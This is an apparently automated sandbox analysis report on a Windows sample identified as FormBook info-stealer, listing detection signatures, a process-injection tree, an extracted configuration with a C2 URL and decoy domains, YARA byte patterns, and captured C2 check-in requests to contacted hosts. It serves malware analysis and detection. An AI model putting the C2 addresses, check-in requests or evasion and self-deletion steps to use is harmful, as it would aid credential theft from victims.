Loading ...

Play interactive tourEdit tour

Windows Analysis Report NvkGETsSDb.exe

Overview

General Information

Sample Name:NvkGETsSDb.exe
Analysis ID:510425
MD5:e17b528f9c192653dc9777bd46e48d82
SHA1:f4dfc93942ed0c091340057f1164b1e1e6f4a148
SHA256:83708560ecc442b5b6dadbdf5af39ae4f1e843664c932a9de3eff1e38bf6d4a5
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses ipconfig to lookup or modify the Windows network settings
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • NvkGETsSDb.exe (PID: 2500 cmdline: 'C:\Users\user\Desktop\NvkGETsSDb.exe' MD5: E17B528F9C192653DC9777BD46E48D82)
    • NvkGETsSDb.exe (PID: 3092 cmdline: C:\Users\user\Desktop\NvkGETsSDb.exe MD5: E17B528F9C192653DC9777BD46E48D82)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • ipconfig.exe (PID: 6236 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
          • cmd.exe (PID: 6268 cmdline: /c del 'C:\Users\user\Desktop\NvkGETsSDb.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.agentpathleurre.space/s18y/"], "decoy": ["jokes-online.com", "dzzdjn.com", "lizzieerhardtebnaryepptts.com", "interfacehand.xyz", "sale-m.site", "block-facebook.com", "dicasdamadrinha.com", "maythewind.com", "hasari.net", "omnists.com", "thevalley-eg.com", "rdfj.xyz", "szhfcy.com", "alkalineage.club", "fdf.xyz", "absorplus.com", "poldolongo.com", "badassshirts.club", "ferienwohnungenmv.com", "bilboondokoak.com", "ambrosiaaudio.com", "lifeneurologyclub.com", "femboys.world", "blehmails.com", "gametimebg.com", "duytienauto.net", "owerful.com", "amedicalsupplyco.com", "americonnlogistics.com", "ateamautoglassga.com", "clickstool.com", "fzdzcnj.com", "txtgo.xyz", "izassist.com", "3bangzhu.com", "myesstyle.com", "aek181129aek.xyz", "daoxinghumaotest.com", "jxdg.xyz", "restorationculturecon.com", "thenaturalnutrient.com", "sportsandgames.info", "spiderwebinar.net", "erqgseidx.com", "donutmastermind.com", "aidatislemleri-govtr.com", "weetsist.com", "sunsetschoolportaits.com", "exodusguarant.tech", "gsnbls.top", "huangdashi33.xyz", "amazonretoure.net", "greathomeinlakewood.com", "lenovoidc.com", "qiuhenglawfirm.com", "surveyorslimited.com", "carterscts.com", "helmosy.online", "bakersfieldlaughingstock.com", "as-payjrku.icu", "mr-exclusive.com", "givepy.info", "ifvita.com", "obesocarpinteria.online"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
    00000010.00000002.516991020.00000000028C0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000010.00000002.516991020.00000000028C0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 30 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.NvkGETsSDb.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.NvkGETsSDb.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.NvkGETsSDb.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18849:$sqlite3step: 68 34 1C 7B E1
        • 0x1895c:$sqlite3step: 68 34 1C 7B E1
        • 0x18878:$sqlite3text: 68 38 2A 90 C5
        • 0x1899d:$sqlite3text: 68 38 2A 90 C5
        • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
        2.2.NvkGETsSDb.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.NvkGETsSDb.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 23 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.agentpathleurre.space/s18y/"], "decoy": ["jokes-online.com", "dzzdjn.com", "lizzieerhardtebnaryepptts.com", "interfacehand.xyz", "sale-m.site", "block-facebook.com", "dicasdamadrinha.com", "maythewind.com", "hasari.net", "omnists.com", "thevalley-eg.com", "rdfj.xyz", "szhfcy.com", "alkalineage.club", "fdf.xyz", "absorplus.com", "poldolongo.com", "badassshirts.club", "ferienwohnungenmv.com", "bilboondokoak.com", "ambrosiaaudio.com", "lifeneurologyclub.com", "femboys.world", "blehmails.com", "gametimebg.com", "duytienauto.net", "owerful.com", "amedicalsupplyco.com", "americonnlogistics.com", "ateamautoglassga.com", "clickstool.com", "fzdzcnj.com", "txtgo.xyz", "izassist.com", "3bangzhu.com", "myesstyle.com", "aek181129aek.xyz", "daoxinghumaotest.com", "jxdg.xyz", "restorationculturecon.com", "thenaturalnutrient.com", "sportsandgames.info", "spiderwebinar.net", "erqgseidx.com", "donutmastermind.com", "aidatislemleri-govtr.com", "weetsist.com", "sunsetschoolportaits.com", "exodusguarant.tech", "gsnbls.top", "huangdashi33.xyz", "amazonretoure.net", "greathomeinlakewood.com", "lenovoidc.com", "qiuhenglawfirm.com", "surveyorslimited.com", "carterscts.com", "helmosy.online", "bakersfieldlaughingstock.com", "as-payjrku.icu", "mr-exclusive.com", "givepy.info", "ifvita.com", "obesocarpinteria.online"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: NvkGETsSDb.exeVirustotal: Detection: 15%Perma Link
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.2.NvkGETsSDb.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.NvkGETsSDb.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.NvkGETsSDb.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.NvkGETsSDb.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.NvkGETsSDb.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.NvkGETsSDb.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.NvkGETsSDb.exe.3a2f770.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.NvkGETsSDb.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.NvkGETsSDb.exe.39e0150.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.516991020.00000000028C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.303659400.000000000F70F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.253147010.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.315756855.0000000000FD0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.515839448.0000000002700000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.288307054.000000000F70F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.253638394.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.315792746.0000000001000000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.257370628.00000000038A9000.00000004.00000001.sdmp, type: MEMORY
          Source: 2.2.NvkGETsSDb.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.NvkGETsSDb.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.NvkGETsSDb.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.NvkGETsSDb.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: NvkGETsSDb.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: NvkGETsSDb.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: ipconfig.pdb source: NvkGETsSDb.exe, 00000002.00000002.315857212.000000000103A000.00000004.00000020.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: NvkGETsSDb.exe, 00000002.00000002.315857212.000000000103A000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: NvkGETsSDb.exe, 00000002.00000002.315947777.0000000001470000.00000040.00000001.sdmp, ipconfig.exe, 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: NvkGETsSDb.exe, 00000002.00000002.315947777.0000000001470000.00000040.00000001.sdmp, ipconfig.exe
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 4x nop then pop esi2_2_00417326
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 4x nop then pop edi2_2_00417DA8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop esi16_2_00167326
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop edi16_2_00167DA8

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49808 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49808 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49808 -> 184.168.131.241:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.carterscts.com
          Source: C:\Windows\explorer.exeDomain query: www.lenovoidc.com
          Source: C:\Windows\explorer.exeDomain query: www.mr-exclusive.com
          Source: C:\Windows\explorer.exeNetwork Connect: 198.46.90.29 80Jump to behavior
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.agentpathleurre.space/s18y/
          Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
          Source: Joe Sandbox ViewASN Name: INMOTI-1US INMOTI-1US
          Source: global trafficHTTP traffic detected: GET /s18y/?eXwdIN10=4Ci6vsYQWs8id7GhdYTjZRJculBFGSFOZGvHXdH6NGfnjVfmX1rRX92W0hUQgL+8jwmH&3fU4r=D2MpiZv HTTP/1.1Host: www.carterscts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /s18y/?eXwdIN10=Pa4nojFHNdgR9BnFd7o8aKQocYkXN/E4z79GVA9AtWALsHU61u0W5ib2TTz7NOJsFj7K&3fU4r=D2MpiZv HTTP/1.1Host: www.mr-exclusive.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 184.168.131.241 184.168.131.241
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.21.3Date: Wed, 27 Oct 2021 17:37:28 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 236Connection: closeVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 61 79 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 20 6f 72 20 72 65 2d 6e 61 6d 65 64 2e 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 77 65 62 20 73 69 74 65 20 6f 77 6e 65 72 20 66 6f 72 20 66 75 72 74 68 65 72 20 61 73 73 69 73 74 61 6e 63 65 2e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Error 404 - Not Found</title><head><body><h1>Error 404 - Not Found</h1><p>The document you are looking for may have been removed or re-named. Please contact the web site owner for further assistance.</p></body></html>
          Source: NvkGETsSDb.exe, 00000000.00000002.256996800.00000000028A1000.00000004.00000001.sdmpString found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
          Source: ipconfig.exe, 00000010.00000002.519067627.000000000358F000.00000004.00020000.sdmpString found in binary or memory: https://www.afternic.com/forsale/mr-exclusive.com?utm_source=TDFS&utm_medium=sn_affiliate_click&utm_
          Source: unknownDNS traffic detected: queries for: www.carterscts.com
          Source: global trafficHTTP traffic detected: GET /s18y/?eXwdIN10=4Ci6vsYQWs8id7GhdYTjZRJculBFGSFOZGvHXdH6NGfnjVfmX1rRX92W0hUQgL+8jwmH&3fU4r=D2MpiZv HTTP/1.1Host: www.carterscts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /s18y/?eXwdIN10=Pa4nojFHNdgR9BnFd7o8aKQocYkXN/E4z79GVA9AtWALsHU61u0W5ib2TTz7NOJsFj7K&3fU4r=D2MpiZv HTTP/1.1Host: www.mr-exclusive.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.2.NvkGETsSDb.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.NvkGETsSDb.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.NvkGETsSDb.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.NvkGETsSDb.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.NvkGETsSDb.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.NvkGETsSDb.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.NvkGETsSDb.exe.3a2f770.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.NvkGETsSDb.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.NvkGETsSDb.exe.39e0150.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.516991020.00000000028C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.303659400.000000000F70F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.253147010.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.315756855.0000000000FD0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.515839448.0000000002700000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.288307054.000000000F70F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.253638394.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.315792746.0000000001000000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.257370628.00000000038A9000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 2.2.NvkGETsSDb.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.NvkGETsSDb.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.NvkGETsSDb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.NvkGETsSDb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.NvkGETsSDb.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.NvkGETsSDb.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.NvkGETsSDb.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.NvkGETsSDb.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.NvkGETsSDb.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.NvkGETsSDb.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.NvkGETsSDb.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.NvkGETsSDb.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.NvkGETsSDb.exe.3a2f770.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.NvkGETsSDb.exe.3a2f770.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.NvkGETsSDb.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.NvkGETsSDb.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.NvkGETsSDb.exe.39e0150.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.NvkGETsSDb.exe.39e0150.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.516991020.00000000028C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.516991020.00000000028C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.303659400.000000000F70F000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.303659400.000000000F70F000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.253147010.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.253147010.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.315756855.0000000000FD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.315756855.0000000000FD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.515839448.0000000002700000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.515839448.0000000002700000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.288307054.000000000F70F000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.288307054.000000000F70F000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.253638394.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.253638394.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.315792746.0000000001000000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.315792746.0000000001000000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.257370628.00000000038A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.257370628.00000000038A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: NvkGETsSDb.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
